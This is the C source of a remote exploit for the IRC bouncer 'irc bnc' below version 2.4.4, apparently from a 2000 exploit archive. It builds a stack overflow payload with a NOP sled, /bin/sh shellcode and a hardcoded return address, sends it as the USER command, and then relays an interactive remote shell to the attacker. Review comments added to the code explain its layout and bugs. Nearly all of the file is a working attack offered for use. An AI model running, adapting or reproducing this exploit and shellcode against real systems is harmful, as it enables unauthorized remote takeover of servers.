/* Exploit for irc bnc < 2.4.4.
* This is only my third remote exploit, ever, so it might be a bit rough
* around the edges. For instance the distance from the stack to the ret
* pointer has to be *exactly* 1031 for this to work
*
* Tekneeq - http://www.attrition.org/hosted/tekneeq
*/
#include <stdio.h>
#include <unistd.h>
#include <stdarg.h>
#include <netdb.h>
#include <sys/types.h>
#include <sys/time.h>
#include <sys/socket.h>
#include <netinet/in.h>
#define RET_POS 1031
#define RETURN_ADDRESS 0xbffff9e0
char hellcode[]="\x31\xdb\x89\xd8\x89\xd9\xfe\xc1\xb0\x3f\xcd\x80\xfe\xc1"
"\x31\xc0\xb0\x3f\xcd\x80\xeb\x1f\x5e\x89\x76\x08\x31\xc0"
"\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d"
"\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff"
"\xff\xff/bin/sh";
int fdprintf(int dafd,char *fmt,...);
int tcp_connect(struct in_addr addr,unsigned short port);
void RunShell(int thesock);
/*
 * Entry point. Usage: <host> <port>.
 *
 * Builds the payload in overflow_buf as follows:
 *   - every byte set to 0x90 (NOPs, per the author's comment)
 *   - hellcode copied so that its last byte lands at offset RET_POS-1
 *   - RETURN_ADDRESS stored at offset RET_POS through the `ret` alias
 *   - a NUL placed at RET_POS+4, so the string passed to fdprintf() is
 *     RET_POS+4 bytes long and the rest of the 4096-byte buffer is never sent
 * It then connects, sends the buffer as the USER argument, waits two
 * seconds and hands the socket to RunShell().
 *
 * NOTE(review): host_to_ip() is defined further down with no prototype
 * above, and exit()/atoi()/memset()/strlen() are used without <stdlib.h>
 * or <string.h>, so this file relies on implicit declarations that
 * current compilers reject. All error paths exit with status 0.
 */
int main (int argc,char **argv)
{
    int fd;                            /* connected socket */
    int ctr,a;                         /* copy indices for hellcode */
    struct in_addr host;
    unsigned short port;
    unsigned char overflow_buf[4096];  /* payload sent as the USER argument */
    unsigned long *ret;                /* aliases overflow_buf + RET_POS */
    if (argc < 3)
    {
        printf("Usage: %s <host> <port>\n",argv[0]);
        exit(0);
    }
    if (!host_to_ip(argv[1],&host))
    {
        fprintf(stderr,"Hostname lookup failure\n");
        exit(0);
    }
    /* atoi() result is narrowed to unsigned short; only 0 is rejected */
    if (!(port=atoi(argv[2])))
    {
        fprintf(stderr,"Invalid port !\n");
        exit(0);
    }
    memset(overflow_buf,0x90,sizeof(overflow_buf)); /* fill it with NOPs */
    /* copy strlen(hellcode) bytes ending at offset RET_POS-1 */
    a=0;
    for (ctr=(RET_POS-strlen(hellcode));ctr<(RET_POS);ctr++)
        overflow_buf[ctr]=hellcode[a++];
    /* terminator: the string handed to fdprintf() ends here */
    overflow_buf[RET_POS+4]=0;
    /* writes sizeof(unsigned long) bytes at RET_POS; the 4-byte layout
     * implied by the NUL at RET_POS+4 assumes a 32-bit build */
    ret=(unsigned long *)(overflow_buf+RET_POS);
    *ret=RETURN_ADDRESS;
    printf("Connecting\n");
    fd=tcp_connect(host,port);
    printf("Sending overflow\n");
    fdprintf(fd,"USER %s\r\n",overflow_buf);
    sleep(2);
    /* printed unconditionally; nothing checks the server's response */
    printf("Got shell\n");
    RunShell(fd);
    /* no return statement: control falls off the end of main */
}
/*
 * Open a TCP connection to addr:port (port given in host byte order).
 * Returns the connected socket descriptor. If socket() or connect()
 * fails, the error is reported with perror() and the process exits
 * with status 0, so the function never returns a negative value.
 */
int tcp_connect(struct in_addr addr,unsigned short port)
{
    struct sockaddr_in target = {0};
    int sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

    if (sock < 0) {
        perror("socket");
        exit(0);
    }
    target.sin_family = AF_INET;
    target.sin_port = htons(port);
    target.sin_addr = addr;
    if (connect(sock, (struct sockaddr *)&target, sizeof target) < 0) {
        perror("connect");
        exit(0);
    }
    return sock;
}
/*
 * printf-style helper: formats into a 4096-byte stack buffer with
 * vsnprintf() and write()s the resulting C string to dafd. Output
 * longer than 4095 characters is silently truncated, and the write()
 * result is not checked. Always returns 1.
 */
int fdprintf(int dafd,char *fmt,...)
{
    char out[4096];
    va_list args;

    va_start(args, fmt);
    vsnprintf(out, sizeof out, fmt, args);
    va_end(args);
    write(dafd, out, strlen(out));
    return 1;
}
/*
 * Resolve hostname with gethostbyname() and copy the first returned
 * address (h_length bytes) into *addr.
 * Returns 1 on success, 0 when the lookup fails.
 */
int host_to_ip(char *hostname,struct in_addr *addr)
{
    struct hostent *ent = gethostbyname(hostname);

    if (!ent) {
        return 0;
    }
    memcpy(addr, ent->h_addr, ent->h_length);
    return 1;
}
/*
 * Interactive relay between the connected socket and the terminal:
 * select() waits on thesock and stdin; socket data is printed to
 * stdout, stdin data is forwarded to the socket. When the peer closes
 * the connection (read() returns <= 0) the process exits with status 0.
 *
 * NOTE(review): recvbuf is 1024 bytes and both read() calls request
 * 1024, so a full read (n == 1024) makes recvbuf[n]=0 write one byte
 * past the end of the array. The select() and write() return values
 * are not checked.
 */
void RunShell(int thesock)
{
    int n;
    char recvbuf[1024];
    fd_set rset;
    while (1)
    {
        /* rebuilt every iteration: select() modifies the set in place */
        FD_ZERO(&rset);
        FD_SET(thesock,&rset);
        FD_SET(STDIN_FILENO,&rset);
        select(thesock+1,&rset,NULL,NULL,NULL);
        if (FD_ISSET(thesock,&rset))
        {
            n=read(thesock,recvbuf,1024);
            if (n <= 0)
            {
                printf("Connection closed\n");
                exit(0);
            }
            /* out of bounds when n == 1024 (see note above) */
            recvbuf[n]=0;
            printf("%s",recvbuf);
        }
        if (FD_ISSET(STDIN_FILENO,&rset))
        {
            n=read(STDIN_FILENO,recvbuf,1024);
            if (n>0)
            {
                /* terminator is unused here: write() is given n directly */
                recvbuf[n]=0;
                write(thesock,recvbuf,n);
            }
        }
    }
}
/* www.hack.co.za [2000]*/